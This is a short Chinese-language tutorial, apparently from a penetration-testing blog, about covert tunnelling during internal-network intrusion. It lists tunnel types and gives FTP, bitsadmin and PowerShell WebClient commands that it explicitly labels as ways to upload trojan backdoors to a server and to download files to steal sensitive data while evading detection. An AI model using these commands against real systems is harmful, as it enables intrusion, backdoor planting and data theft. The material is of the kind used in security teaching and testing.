隐藏通信隧道技术.
隐藏通信隧道就是一种 绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上.
目录:
(1)利用 FTP协议 上传.(可以将木马后门上传 到服务器里面去)
(2)利用 Bitsadmin 上传.(可以将木马后门上传 到服务器里面去)
(3)利用 PowerShell 上传.(可以将木马后门上传 到服务器里面去)
当我们内网收集完信息完,就有进行下一步判断 然后做隧道通信.
(1)进出口流量是否连通的判断,是否出得去,进得来.
(2)在非受信任的网络中实现安全的数据传输.
(3)使用隐蔽的手段逃避安全监测措施和溯源追踪.
常用的隧道有以下:
网络层:IPv6隧道、ICMP隧道、GRE隧道.
传输层:TCP隧道、UDP隧道、常规端口转发.
应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道.
免责声明:
严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
隧道技术的 上传 和 下载 步骤:
将文件上传 到 服务器.
(1)利用 FTP协议 上传.(可以将木马后门上传 到服务器里面去)
ftp 【服务器的IP地址】 //连接:记得服务器要开ftp服务.
put 【本地的文件】 //上传文件:注意路径
上传 完成.
(2)利用 Bitsadmin 上传.(可以将木马后门上传 到服务器里面去)
bitsadmin /rawreturn /transfer down 【你要下载的文件链接】 【保存到本地的路径】
上传 完成.
(3)利用 PowerShell 上传.(可以将木马后门上传 到服务器里面去)
powershell
$h=new-object System.Net.WebClient
$h.DownloadFile('【服务器的下载文件】','【保存到本地的路径】')
上传 完成.
将服务器的文件 下载 下来.
(1)利用 FTP协议 下载.(盗取敏感信息)
ftp 【服务器的IP地址】 //连接:记得服务器要开ftp服务.
get 【文件名】 //记得是服务器的当前目录中有这个文件才行.(要不然下载不了.)
下载 完成.